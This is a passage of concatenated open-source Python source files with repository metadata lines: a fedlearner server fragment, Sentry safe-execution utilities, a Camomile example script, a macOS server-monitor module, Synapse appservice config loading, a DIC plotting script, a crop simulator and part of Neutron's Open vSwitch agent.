def stop(self):
if self._server_started:
self._data_portal_master.stop()
self._server.stop(None)
self._server_started = False
logging.warning("DataPortalMasterService name as %s"\
"stopped ", self._portal_name)
def run(self):
self.start()
self._server.wait_for_termination()
self.stop()
| bytedance/fedlearner | fedlearner/data_join/data_portal_master.py | Python | apache-2.0 | 4,823 |
from __future__ import absolute_import, print_function
import collections
import logging
import six
from django.conf import settings
from django.db import transaction
from django.utils.encoding import force_text
from sentry.utils import json
from sentry.utils.strings import truncatechars
def safe_execute(func, *args, **kwargs):
# TODO: we should make smart savepoints (only executing the savepoint server
# side if we execute a query)
_with_transaction = kwargs.pop("_with_transaction", True)
expected_errors = kwargs.pop("expected_errors", None)
_passthrough_errors = kwargs.pop("_passthrough_errors", None)
try:
if _with_transaction:
with transaction.atomic():
result = func(*args, **kwargs)
else:
result = func(*args, **kwargs)
except Exception as e:
if _passthrough_errors and isinstance(e, _passthrough_errors):
raise
if hasattr(func, "im_class"):
cls = func.im_class
else:
cls = func.__class__
func_name = getattr(func, "__name__", six.text_type(func))
cls_name = cls.__name__
logger = logging.getLogger("sentry.safe.%s" % (cls_name.lower(),))
if expected_errors and isinstance(e, expected_errors):
logger.info("%s.process_error_ignored", func_name, extra={"exception": e})
return
logger.error("%s.process_error", func_name, exc_info=True, extra={"exception": e})
else:
return result
def trim(
value,
max_size=settings.SENTRY_MAX_VARIABLE_SIZE,
max_depth=6,
object_hook=None,
_depth=0,
_size=0,
**kwargs
):
"""
Truncates a value to ```MAX_VARIABLE_SIZE```.
The method of truncation depends on the type of value.
"""
options = {
"max_depth": max_depth,
"max_size": max_size,
"object_hook": object_hook,
"_depth": _depth + 1,
}
if _depth > max_depth:
if not isinstance(value, six.string_types):
value = json.dumps(value)
return trim(value, _size=_size, max_size=max_size)
elif isinstance(value, dict):
result = {}
_size += 2
for k in sorted(value.keys()):
v = value[k]
trim_v = trim(v, _size=_size, **options)
result[k] = trim_v
_size += len(force_text(trim_v)) + 1
if _size >= max_size:
break
elif isinstance(value, (list, tuple)):
result = []
_size += 2
for v in value:
trim_v = trim(v, _size=_size, **options)
result.append(trim_v)
_size += len(force_text(trim_v))
if _size >= max_size:
break
if isinstance(value, tuple):
result = tuple(result)
elif isinstance(value, six.string_types):
result = truncatechars(value, max_size - _size)
else:
result = value
if object_hook is None:
return result
return object_hook(result)
def trim_pairs(iterable, max_items=settings.SENTRY_MAX_DICTIONARY_ITEMS, **kwargs):
max_items -= 1
result = []
for idx, item in enumerate(iterable):
key, value = item
result.append((key, trim(value, **kwargs)))
if idx > max_items:
return result
return result
def trim_dict(value, max_items=settings.SENTRY_MAX_DICTIONARY_ITEMS, **kwargs):
max_items -= 1
for idx, key in enumerate(list(iter(value))):
value[key] = trim(value[key], **kwargs)
if idx > max_items:
del value[key]
return value
def get_path(data, *path, **kwargs):
"""
Safely resolves data from a recursive data structure. A value is only
returned if the full path exists, otherwise ``None`` is returned.
If the ``default`` argument is specified, it is returned instead of ``None``.
If the ``filter`` argument is specified and the value is a list, it is
filtered with the given callback. Alternatively, pass ``True`` as filter to
only filter ``None`` values.
"""
default = kwargs.pop("default", None)
f = kwargs.pop("filter", None)
for k in kwargs:
raise TypeError("set_path() got an undefined keyword argument '%s'" % k)
for p in path:
if isinstance(data, collections.Mapping) and p in data:
data = data[p]
elif isinstance(data, (list, tuple)) and -len(data) <= p < len(data):
data = data[p]
else:
return default
if f and data and isinstance(data, (list, tuple)):
data = list(filter((lambda x: x is not None) if f is True else f, data))
return data if data is not None else default
def set_path(data, *path, **kwargs):
"""
Recursively traverses or creates the specified path and sets the given value
argument. `None` is treated like a missing value. If a non-mapping item is
encountered while traversing, the value is not set.
This function is equivalent to a recursive dict.__setitem__. Returns True if
the value was set, otherwise False.
If the ``overwrite` kwarg is set to False, the value is only set if there is
no existing value or it is None. See ``setdefault_path``.
"""
try:
value = kwargs.pop("value")
except KeyError:
raise TypeError("set_path() requires a 'value' keyword argument")
overwrite = kwargs.pop("overwrite", True)
for k in kwargs:
raise TypeError("set_path() got an undefined keyword argument '%s'" % k)
for p in path[:-1]:
if not isinstance(data, collections.Mapping):
return False
if data.get(p) is None:
data[p] = {}
data = data[p]
if not isinstance(data, collections.Mapping):
return False
p = path[-1]
if overwrite or data.get(p) is None:
data[p] = value
return True
return False
def setdefault_path(data, *path, **kwargs):
"""
Recursively traverses or creates the specified path and sets the given value
argument if it does not exist. `None` is treated like a missing value. If a
non-mapping item is encountered while traversing, the value is not set.
This function is equivalent to a recursive dict.setdefault, except for None
values. Returns True if the value was set, otherwise False.
"""
kwargs["overwrite"] = False
return set_path(data, *path, **kwargs)
| mvaled/sentry | src/sentry/utils/safe.py | Python | bsd-3-clause | 6,439 |
# The MIT License (MIT)
# Copyright (c) 2014-2015 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# === EDIT ====================================================================
SERVER = 'http://localhost:12345'
ROOT_PASSWORD = 'password'
# admin usernname and password
ADMIN = 'administrator'
ADMIN_PASSWORD = 'password'
# template of path to video files (relative to /media)
URL = 'REPERE/phase2/test/{name}'
# =============================================================================
from camomile import Camomile
client = Camomile(SERVER)
# login as root
client.login('root', ROOT_PASSWORD)
# create new admin user
admin = client.createUser(ADMIN, ADMIN_PASSWORD, role='admin', returns_id=True)
# login as admin
client.login(ADMIN, ADMIN_PASSWORD)
# create new corpus
corpus = client.createCorpus('REPERE', returns_id=True)
# add media to corpus and keep track of their IDs
mediaID = {}
with open('media.lst', 'r') as f:
for medium in f:
# remove trailing "\n"
name = medium.strip()
# create medium
mediaID[name] = client.createMedium(
corpus, name, url=URL.format(name=name), returns_id=True)
# parse sample annotation files
def parse(path, mediaID):
annotations = []
with open(path, 'r') as f:
for line in f:
# remove trailing "\n" and split on spaces
tokens = line.strip().split()
# get medium ID
mediumName = tokens[0]
id_medium = mediaID[mediumName]
# get fragment start and end times
startTime = float(tokens[1])
endTime = float(tokens[2])
# get data
label = tokens[4]
annotation = {'fragment': {'start': startTime, 'end': endTime},
'data': label,
'id_medium': id_medium}
# append annotations to the list
annotations.append(annotation)
return annotations
# create reference layer
annotations = parse('reference.repere', mediaID)
reference = client.createLayer(
corpus, 'reference',
fragment_type='segment',
data_type='label',
annotations=annotations,
returns_id=True)
# create hypothesis layers
for i in [2]:
path = 'hypothesis{i}.repere'.format(i=i)
annotations = parse(path, mediaID)
hypothesis = client.createLayer(
corpus,
'hypothesis {i}'.format(i=i),
fragment_type='segment',
data_type='label',
annotations=annotations,
returns_id=True)
| camomile-project/camomile-client-python | example/populate.py | Python | mit | 3,552 |
#!/usr/bin/python
# Copyleft 2010, Daniel Beecham <joshu@lunix.se>
# All rights reversed.
"""This module will get and send Mac serial, system build and Mac OS X version."""
import cnf
import commands
import urllib
import sys
import re
def main():
"""servermonitor.mac main function."""
if sys.platform == 'darwin':
if not cnf.quiet:
print "Serial+Build: ",
# Get serial number
serial = commands.getoutput('/usr/sbin/ioreg -l | /usr/bin/grep IOPlatformSerialNumber')
serial = re.search(r'IOPlatformSerialNumber" = "([^"]+)', serial).group(1)
# Get Mac OS X version and system build
sw_vers = commands.getoutput('sw_vers')
osx_version = sw_vers.split(':')[2].split('\n')[0].replace('\t','')
build_version = sw_vers.split(':')[3].replace('\t','')
# Make it a dict along with id and password.
data = {'serial':serial, 'build_version':build_version, 'osx_version':osx_version,'id':cnf.id, 'password':cnf.password}
# And send it.
handle = urllib.urlopen(cnf.addr + "/handlers/mac.php", urllib.urlencode(data))
if not cnf.quiet:
print handle.read()
# vim: expandtab tabstop=4 shiftwidth=4
| jhaals/servermonitor | modules/mac.py | Python | bsd-3-clause | 1,236 |
# Copyright 2015, 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ._base import Config, ConfigError
from synapse.appservice import ApplicationService
from synapse.types import UserID
import urllib
import yaml
import logging
logger = logging.getLogger(__name__)
class AppServiceConfig(Config):
def read_config(self, config):
self.app_service_config_files = config.get("app_service_config_files", [])
self.notify_appservices = config.get("notify_appservices", True)
def default_config(cls, **kwargs):
return """\
# A list of application service config file to use
app_service_config_files: []
"""
def load_appservices(hostname, config_files):
"""Returns a list of Application Services from the config files."""
if not isinstance(config_files, list):
logger.warning(
"Expected %s to be a list of AS config files.", config_files
)
return []
# Dicts of value -> filename
seen_as_tokens = {}
seen_ids = {}
appservices = []
for config_file in config_files:
try:
with open(config_file, 'r') as f:
appservice = _load_appservice(
hostname, yaml.load(f), config_file
)
if appservice.id in seen_ids:
raise ConfigError(
"Cannot reuse ID across application services: "
"%s (files: %s, %s)" % (
appservice.id, config_file, seen_ids[appservice.id],
)
)
seen_ids[appservice.id] = config_file
if appservice.token in seen_as_tokens:
raise ConfigError(
"Cannot reuse as_token across application services: "
"%s (files: %s, %s)" % (
appservice.token,
config_file,
seen_as_tokens[appservice.token],
)
)
seen_as_tokens[appservice.token] = config_file
logger.info("Loaded application service: %s", appservice)
appservices.append(appservice)
except Exception as e:
logger.error("Failed to load appservice from '%s'", config_file)
logger.exception(e)
raise
return appservices
def _load_appservice(hostname, as_info, config_filename):
required_string_fields = [
"id", "as_token", "hs_token", "sender_localpart"
]
for field in required_string_fields:
if not isinstance(as_info.get(field), basestring):
raise KeyError("Required string field: '%s' (%s)" % (
field, config_filename,
))
# 'url' must either be a string or explicitly null, not missing
# to avoid accidentally turning off push for ASes.
if (not isinstance(as_info.get("url"), basestring) and
as_info.get("url", "") is not None):
raise KeyError(
"Required string field or explicit null: 'url' (%s)" % (config_filename,)
)
localpart = as_info["sender_localpart"]
if urllib.quote(localpart) != localpart:
raise ValueError(
"sender_localpart needs characters which are not URL encoded."
)
user = UserID(localpart, hostname)
user_id = user.to_string()
# Rate limiting for users of this AS is on by default (excludes sender)
rate_limited = True
if isinstance(as_info.get("rate_limited"), bool):
rate_limited = as_info.get("rate_limited")
# namespace checks
if not isinstance(as_info.get("namespaces"), dict):
raise KeyError("Requires 'namespaces' object.")
for ns in ApplicationService.NS_LIST:
# specific namespaces are optional
if ns in as_info["namespaces"]:
# expect a list of dicts with exclusive and regex keys
for regex_obj in as_info["namespaces"][ns]:
if not isinstance(regex_obj, dict):
raise ValueError(
"Expected namespace entry in %s to be an object,"
" but got %s", ns, regex_obj
)
if not isinstance(regex_obj.get("regex"), basestring):
raise ValueError(
"Missing/bad type 'regex' key in %s", regex_obj
)
if not isinstance(regex_obj.get("exclusive"), bool):
raise ValueError(
"Missing/bad type 'exclusive' key in %s", regex_obj
)
# protocols check
protocols = as_info.get("protocols")
if protocols:
# Because strings are lists in python
if isinstance(protocols, str) or not isinstance(protocols, list):
raise KeyError("Optional 'protocols' must be a list if present.")
for p in protocols:
if not isinstance(p, str):
raise KeyError("Bad value for 'protocols' item")
if as_info["url"] is None:
logger.info(
"(%s) Explicitly empty 'url' provided. This application service"
" will not receive events or queries.",
config_filename,
)
return ApplicationService(
token=as_info["as_token"],
url=as_info["url"],
namespaces=as_info["namespaces"],
hs_token=as_info["hs_token"],
sender=user_id,
id=as_info["id"],
protocols=protocols,
rate_limited=rate_limited
)
| TribeMedia/synapse | synapse/config/appservice.py | Python | apache-2.0 | 6,118 |
from dic.experiment import Experiment
from dic.plots import generate_plots
'''This script generates data for a given experiment condition and plots it in
a single figure. Plotting options are:
polar: Plots in polar coordinates if true, otherwise Cartesian.
areaplot: Plots the "error area" (\gamma*\sigma_gamma*\sigma_theta) if true,
otherwise, creates 4x4 variable-specific plots
show: Displays the figure if true, otherwise does not. Used when saving.'''
experiment = Experiment(lens=40,
weak_grad=False,
lamda=546,
approaches=['A: 2x2', 'A: 2x3', 'B: 2x3', 'B: 2x4'],
k=1e2,
fromZero=True,
save=False,
filepath=None)
sigma_g, sigma_t = experiment.generate_data(sample_size=100)
generate_plots(sigma_g, sigma_t, experiment,
polar=True,
areaplot=True,
SNR=False,
report=False,
show=True)
| scott-trinkle/DIC | main.py | Python | mit | 1,049 |
import random
class Crop:
#Konstruktor
def __init__(self, growth_rate, light_need, water_need):
#Attribute
self._growth = 0
self._days_growing = 0
self._growth_rate = growth_rate
self._light_need = light_need
self._water_need = water_need
self._status = "Seed"
self._type = "Generic"
#Dictionary mit Water und Light - Needs
def needs(self):
return {'light need':self._light_need, 'water need':self._water_need}
#Dictionary mit Current-State des Crop´s
def report(self):
return {'Type':self._type, 'Status':self._status, 'Growth':self._growth, 'Days Growing':self._days_growing}
#Update Status
def _update_status(self):
if self._growth > 15:
self._status = "Old"
elif self._growth > 10:
self._status = "Mature"
elif self._growth > 5:
self._status = "Young"
elif self._growth > 0:
self._status = "Seedling"
elif self._growth == 0:
self._status = "Seed"
#Wachsen lassen
def grow(self, light, water):
if light >= self._light_need and water >= self._water_need:
self._growth += self._growth_rate
#Wachstumstage inkrementieren
self._days_growing += 1
#Status-Update
self._update_status()
#Klassenunabhängige Funktion
def auto_grow(crop, days):
for day in range (days):
light = random.randint(1,10)
water = random.randint(1,10)
crop.grow(light, water)
#Manuell wachsen lassen
def manual_grow(crop):
#eingabe-abfang
valid = False
while not valid:
try:
light = int(input("Please enter Light Value between 1-10: "))
if 1 <= light <=10:
valid = True
#DER ELSE ZWEIG HIER WIRD NIE VERWENDET, da Automatisch der ValueError abfängt
else:
print("No Valid Value, please enter between 1-10")
except ValueError:
print("No Valid Value, please enter between 1-10")
valid = False
while not valid:
try:
water = int(input("Please enter Water Value between 1-10: "))
if 1 <= water <=10:
valid = True
else:
print("No Valid Value, please enter between 1-10")
except ValueError:
print("No Valid Value, please enter between 1-10")
#Values-gesetzt, Grow the Crop
crop.grow(light, water)
#ALLGEMEIN NUR FÜR TESTZWECKE
def display_menu():
print("1. Grow manually over 1 day")
print("2. Grow automatically over 30 days")
print("3. Report status")
print("0. Exit test program")
print()
print("Please select an option from the above menu")
def get_menu_choice():
option_valid = False
while not option_valid:
try:
choice = int(input("Option Selected: "))
if 0 <= choice <= 4:
option_valid = True
else:
print("Please enter a valid option")
except ValueError:
print("Please enter a valid option")
return choice
def manage_crop(crop):
print("This is the crop management program")
print()
noexit = True
while noexit:
display_menu()
option = get_menu_choice()
print()
if option == 1:
manual_grow(crop)
print()
elif option == 2:
auto_grow(crop, 30)
print()
elif option == 3:
print(crop.report())
print()
elif option == 0:
noexit = False
print()
print("Thank you for using the crop management program")
"""
def main():
#Testinstanz anlegen
new_crop=Crop(1,4,3)
new_crop2=Crop(2,5,7)
#testen
#print(new_crop._status)
#print(new_crop._light_need)
#print(new_crop._water_need)
#print(new_crop2._status)
#print(new_crop2._light_need)
#print(new_crop2._water_need)
#print(new_crop.needs())
#print(new_crop.report())
#new_crop.grow(4,4)
#auto_grow(new_crop, 20)
#manual_grow(new_crop)
#print(new_crop.report())
manage_crop(new_crop)
if __name__ == "__main__":
main()
""" | Tanoshinderuyo/Python | CropSimulator/crop_class.py | Python | gpl-2.0 | 3,607 |
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
import logging as std_logging
import signal
import sys
import time
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_service import loopingcall
import six
from six import moves
from neutron.agent.common import ovs_lib
from neutron.agent.common import polling
from neutron.agent.common import utils
from neutron.agent.linux import ip_lib
from neutron.agent import rpc as agent_rpc
from neutron.agent import securitygroups_rpc as sg_rpc
from neutron.api.rpc.handlers import dvr_rpc
from neutron.common import config
from neutron.common import constants as n_const
from neutron.common import exceptions
from neutron.common import topics
from neutron.common import utils as n_utils
from neutron import context
from neutron.i18n import _LE, _LI, _LW
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2.drivers.l2pop.rpc_manager import l2population_rpc
from neutron.plugins.ml2.drivers.openvswitch.agent.common \
import constants
from neutron.plugins.ml2.drivers.openvswitch.agent \
import ovs_dvr_neutron_agent
LOG = logging.getLogger(__name__)
cfg.CONF.import_group('AGENT', 'neutron.plugins.ml2.drivers.openvswitch.'
'agent.common.config')
cfg.CONF.import_group('OVS', 'neutron.plugins.ml2.drivers.openvswitch.agent.'
'common.config')
# A placeholder for dead vlans.
DEAD_VLAN_TAG = p_const.MAX_VLAN_TAG + 1
class _mac_mydialect(netaddr.mac_unix):
word_fmt = '%.2x'
class DeviceListRetrievalError(exceptions.NeutronException):
message = _("Unable to retrieve port details for devices: %(devices)s ")
# A class to represent a VIF (i.e., a port that has 'iface-id' and 'vif-mac'
# attributes set).
class LocalVLANMapping(object):
def __init__(self, vlan, network_type, physical_network, segmentation_id,
vif_ports=None):
if vif_ports is None:
vif_ports = {}
self.vlan = vlan
self.network_type = network_type
self.physical_network = physical_network
self.segmentation_id = segmentation_id
self.vif_ports = vif_ports
# set of tunnel ports on which packets should be flooded
self.tun_ofports = set()
def __str__(self):
return ("lv-id = %s type = %s phys-net = %s phys-id = %s" %
(self.vlan, self.network_type, self.physical_network,
self.segmentation_id))
class OVSPluginApi(agent_rpc.PluginApi):
pass
class OVSNeutronAgent(sg_rpc.SecurityGroupAgentRpcCallbackMixin,
l2population_rpc.L2populationRpcCallBackTunnelMixin,
dvr_rpc.DVRAgentRpcCallbackMixin):
'''Implements OVS-based tunneling, VLANs and flat networks.
Two local bridges are created: an integration bridge (defaults to
'br-int') and a tunneling bridge (defaults to 'br-tun'). An
additional bridge is created for each physical network interface
used for VLANs and/or flat networks.
All VM VIFs are plugged into the integration bridge. VM VIFs on a
given virtual network share a common "local" VLAN (i.e. not
propagated externally). The VLAN id of this local VLAN is mapped
to the physical networking details realizing that virtual network.
For virtual networks realized as GRE tunnels, a Logical Switch
(LS) identifier is used to differentiate tenant traffic on
inter-HV tunnels. A mesh of tunnels is created to other
Hypervisors in the cloud. These tunnels originate and terminate on
the tunneling bridge of each hypervisor. Port patching is done to
connect local VLANs on the integration bridge to inter-hypervisor
tunnels on the tunnel bridge.
For each virtual network realized as a VLAN or flat network, a
veth or a pair of patch ports is used to connect the local VLAN on
the integration bridge with the physical network bridge, with flow
rules adding, modifying, or stripping VLAN tags as necessary.
'''
# history
# 1.0 Initial version
# 1.1 Support Security Group RPC
# 1.2 Support DVR (Distributed Virtual Router) RPC
# 1.3 Added param devices_to_update to security_groups_provider_updated
target = oslo_messaging.Target(version='1.3')
def __init__(self, bridge_classes, integ_br, tun_br, local_ip,
bridge_mappings, polling_interval, tunnel_types=None,
veth_mtu=None, l2_population=False,
enable_distributed_routing=False,
minimize_polling=False,
ovsdb_monitor_respawn_interval=(
constants.DEFAULT_OVSDBMON_RESPAWN),
arp_responder=False,
prevent_arp_spoofing=True,
use_veth_interconnection=False,
quitting_rpc_timeout=None,
conf=None):
'''Constructor.
:param bridge_classes: a dict for bridge classes.
:param integ_br: name of the integration bridge.
:param tun_br: name of the tunnel bridge.
:param local_ip: local IP address of this hypervisor.
:param bridge_mappings: mappings from physical network name to bridge.
:param polling_interval: interval (secs) to poll DB.
:param tunnel_types: A list of tunnel types to enable support for in
the agent. If set, will automatically set enable_tunneling to
True.
:param veth_mtu: MTU size for veth interfaces.
:param l2_population: Optional, whether L2 population is turned on
:param minimize_polling: Optional, whether to minimize polling by
monitoring ovsdb for interface changes.
:param ovsdb_monitor_respawn_interval: Optional, when using polling
minimization, the number of seconds to wait before respawning
the ovsdb monitor.
:param arp_responder: Optional, enable local ARP responder if it is
supported.
:param prevent_arp_spoofing: Optional, enable suppression of any ARP
responses from ports that don't match an IP address that belongs
to the ports. Spoofing rules will not be added to ports that
have port security disabled.
:param use_veth_interconnection: use veths instead of patch ports to
interconnect the integration bridge to physical bridges.
:param quitting_rpc_timeout: timeout in seconds for rpc calls after
SIGTERM is received
:param conf: an instance of ConfigOpts
'''
super(OVSNeutronAgent, self).__init__()
self.br_int_cls = bridge_classes['br_int']
self.br_phys_cls = bridge_classes['br_phys']
self.br_tun_cls = bridge_classes['br_tun']
self.use_veth_interconnection = use_veth_interconnection
self.veth_mtu = veth_mtu
self.available_local_vlans = set(moves.range(p_const.MIN_VLAN_TAG,
p_const.MAX_VLAN_TAG))
self.use_call = True
self.tunnel_types = tunnel_types or []
self.l2_pop = l2_population
# TODO(ethuleau): Change ARP responder so it's not dependent on the
# ML2 l2 population mechanism driver.
self.enable_distributed_routing = enable_distributed_routing
self.arp_responder_enabled = arp_responder and self.l2_pop
self.prevent_arp_spoofing = prevent_arp_spoofing
self.conf = conf or cfg.CONF
self.agent_state = {
'binary': 'neutron-openvswitch-agent',
'host': self.conf.host,
'topic': n_const.L2_AGENT_TOPIC,
'configurations': {'bridge_mappings': bridge_mappings,
'tunnel_types': self.tunnel_types,
'tunneling_ip': local_ip,
'l2_population': self.l2_pop,
'arp_responder_enabled':
self.arp_responder_enabled,
'enable_distributed_routing':
self.enable_distributed_routing,
'log_agent_heartbeats':
self.conf.AGENT.log_agent_heartbeats},
'agent_type': n_const.AGENT_TYPE_OVS,
'start_flag': True}
if tunnel_types:
self.enable_tunneling = True
else:
self.enable_tunneling = False
# Validate agent configurations
self._check_agent_configurations()
# Keep track of int_br's device count for use by _report_state()
self.int_br_device_count = 0
self.int_br = self.br_int_cls(integ_br)
self.setup_integration_br()
# Stores port update notifications for processing in main rpc loop
self.updated_ports = set()
# Stores port delete notifications
self.deleted_ports = set()
# keeps association between ports and ofports to detect ofport change
self.vifname_to_ofport_map = {}
self.setup_rpc()
self.bridge_mappings = bridge_mappings
self.setup_physical_bridges(self.bridge_mappings)
self.local_vlan_map = {}
self.tun_br_ofports = {p_const.TYPE_GRE: {},
p_const.TYPE_VXLAN: {}}
self.polling_interval = polling_interval
self.minimize_polling = minimize_polling
self.ovsdb_monitor_respawn_interval = ovsdb_monitor_respawn_interval
self.local_ip = local_ip
self.tunnel_count = 0
self.vxlan_udp_port = self.conf.AGENT.vxlan_udp_port
self.dont_fragment = self.conf.AGENT.dont_fragment
self.tun_br = None
self.patch_int_ofport = constants.OFPORT_INVALID
self.patch_tun_ofport = constants.OFPORT_INVALID
if self.enable_tunneling:
# The patch_int_ofport and patch_tun_ofport are updated
# here inside the call to reset_tunnel_br()
self.reset_tunnel_br(tun_br)
self.dvr_agent = ovs_dvr_neutron_agent.OVSDVRNeutronAgent(
self.context,
self.dvr_plugin_rpc,
self.int_br,
self.tun_br,
self.bridge_mappings,
self.phys_brs,
self.int_ofports,
self.phys_ofports,
self.patch_int_ofport,
self.patch_tun_ofport,
self.conf.host,
self.enable_tunneling,
self.enable_distributed_routing)
report_interval = self.conf.AGENT.report_interval
if report_interval:
heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
heartbeat.start(interval=report_interval)
if self.enable_tunneling:
self.setup_tunnel_br()
self.dvr_agent.setup_dvr_flows()
# Collect additional bridges to monitor
self.ancillary_brs = self.setup_ancillary_bridges(integ_br, tun_br)
# In order to keep existed device's local vlan unchanged,
# restore local vlan mapping at start
self._restore_local_vlan_map()
# Security group agent support
self.sg_agent = sg_rpc.SecurityGroupAgentRpc(self.context,
self.sg_plugin_rpc, self.local_vlan_map,
defer_refresh_firewall=True)
# Initialize iteration counter
self.iter_num = 0
self.run_daemon_loop = True
self.catch_sigterm = False
self.catch_sighup = False
# The initialization is complete; we can start receiving messages
self.connection.consume_in_threads()
self.quitting_rpc_timeout = quitting_rpc_timeout
def _report_state(self):
# How many devices are likely used by a VM
self.agent_state.get('configurations')['devices'] = (
self.int_br_device_count)
self.agent_state.get('configurations')['in_distributed_mode'] = (
self.dvr_agent.in_distributed_mode())
try:
self.state_rpc.report_state(self.context,
self.agent_state,
self.use_call)
self.use_call = False
self.agent_state.pop('start_flag', None)
except Exception:
LOG.exception(_LE("Failed reporting state!"))
def _restore_local_vlan_map(self):
cur_ports = self.int_br.get_vif_ports()
port_info = self.int_br.db_list(
"Port", columns=["name", "other_config", "tag"])
by_name = {x['name']: x for x in port_info}
for port in cur_ports:
# if a port was deleted between get_vif_ports and db_lists, we
# will get a KeyError
try:
local_vlan_map = by_name[port.port_name]['other_config']
local_vlan = by_name[port.port_name]['tag']
except KeyError:
continue
if not local_vlan:
continue
net_uuid = local_vlan_map.get('net_uuid')
if (net_uuid and net_uuid not in self.local_vlan_map
and local_vlan != DEAD_VLAN_TAG):
self.provision_local_vlan(local_vlan_map['net_uuid'],
local_vlan_map['network_type'],
local_vlan_map['physical_network'],
local_vlan_map['segmentation_id'],
local_vlan)
def setup_rpc(self):
self.agent_id = 'ovs-agent-%s' % self.conf.host
self.topic = topics.AGENT
self.plugin_rpc = OVSPluginApi(topics.PLUGIN)
self.sg_plugin_rpc = sg_rpc.SecurityGroupServerRpcApi(topics.PLUGIN)
self.dvr_plugin_rpc = dvr_rpc.DVRServerRpcApi(topics.PLUGIN)
self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN)
# RPC network init
self.context = context.get_admin_context_without_session()
# Handle updates from service
self.endpoints = [self]
# Define the listening consumers for the agent
consumers = [[topics.PORT, topics.UPDATE],
[topics.PORT, topics.DELETE],
[constants.TUNNEL, topics.UPDATE],
[constants.TUNNEL, topics.DELETE],
[topics.SECURITY_GROUP, topics.UPDATE],
[topics.DVR, topics.UPDATE]]
if self.l2_pop:
consumers.append([topics.L2POPULATION,
topics.UPDATE, self.conf.host])
self.connection = agent_rpc.create_consumers(self.endpoints,
self.topic,
consumers,
start_listening=False)
def get_net_uuid(self, vif_id):
for network_id, vlan_mapping in six.iteritems(self.local_vlan_map):
if vif_id in vlan_mapping.vif_ports:
return network_id
def port_update(self, context, **kwargs):
port = kwargs.get('port')
# Put the port identifier in the updated_ports set.
# Even if full port details might be provided to this call,
# they are not used since there is no guarantee the notifications
# are processed in the same order as the relevant API requests
self.updated_ports.add(port['id'])
LOG.debug("port_update message processed for port %s", port['id'])
def port_delete(self, context, **kwargs):
port_id = kwargs.get('port_id')
self.deleted_ports.add(port_id)
LOG.debug("port_delete message processed for port %s", port_id)
def process_deleted_ports(self, port_info):
# don't try to process removed ports as deleted ports since
# they are already gone
if 'removed' in port_info:
self.deleted_ports -= port_info['removed']
while self.deleted_ports:
port_id = self.deleted_ports.pop()
# Flush firewall rules and move to dead VLAN so deleted ports no
# longer have access to the network
self.sg_agent.remove_devices_filter([port_id])
port = self.int_br.get_vif_port_by_id(port_id)
if port:
# don't log errors since there is a chance someone will be
# removing the port from the bridge at the same time
self.port_dead(port, log_errors=False)
self.port_unbound(port_id)
def tunnel_update(self, context, **kwargs):
LOG.debug("tunnel_update received")
if not self.enable_tunneling:
return
tunnel_ip = kwargs.get('tunnel_ip')
tunnel_ip_hex = self.get_ip_in_hex(tunnel_ip)
if not tunnel_ip_hex:
return
tunnel_type = kwargs.get('tunnel_type')
if not tunnel_type:
LOG.error(_LE("No tunnel_type specified, cannot create tunnels"))
return
if tunnel_type not in self.tunnel_types:
LOG.error(_LE("tunnel_type %s not supported by agent"),
tunnel_type)
return
if tunnel_ip == self.local_ip:
return
tun_name = '%s-%s' % (tunnel_type, tunnel_ip_hex)
if not self.l2_pop:
self._setup_tunnel_port(self.tun_br, tun_name, tunnel_ip,
tunnel_type)
def tunnel_delete(self, context, **kwargs):
LOG.debug("tunnel_delete received")
if not self.enable_tunneling:
return
tunnel_ip = kwargs.get('tunnel_ip')
if not tunnel_ip:
LOG.error(_LE("No tunnel_ip specified, cannot delete tunnels"))
return
tunnel_type = kwargs.get('tunnel_type')
if not tunnel_type:
LOG.error(_LE("No tunnel_type specified, cannot delete tunnels"))
return
if tunnel_type not in self.tunnel_types:
LOG.error(_LE("tunnel_type %s not supported by agent"),
tunnel_type)
return
ofport = self.tun_br_ofports[tunnel_type].get(tunnel_ip)
self.cleanup_tunnel_port(self.tun_br, ofport, tunnel_type)
def _tunnel_port_lookup(self, network_type, remote_ip):
return self.tun_br_ofports[network_type].get(remote_ip)
def fdb_add(self, context, fdb_entries):
LOG.debug("fdb_add received")
for lvm, agent_ports in self.get_agent_ports(fdb_entries,
self.local_vlan_map):
agent_ports.pop(self.local_ip, None)
if len(agent_ports):
if not self.enable_distributed_routing:
with self.tun_br.deferred() as deferred_br:
self.fdb_add_tun(context, deferred_br, lvm,
agent_ports, self._tunnel_port_lookup)
else:
self.fdb_add_tun(context, self.tun_br, lvm,
agent_ports, self._tunnel_port_lookup)
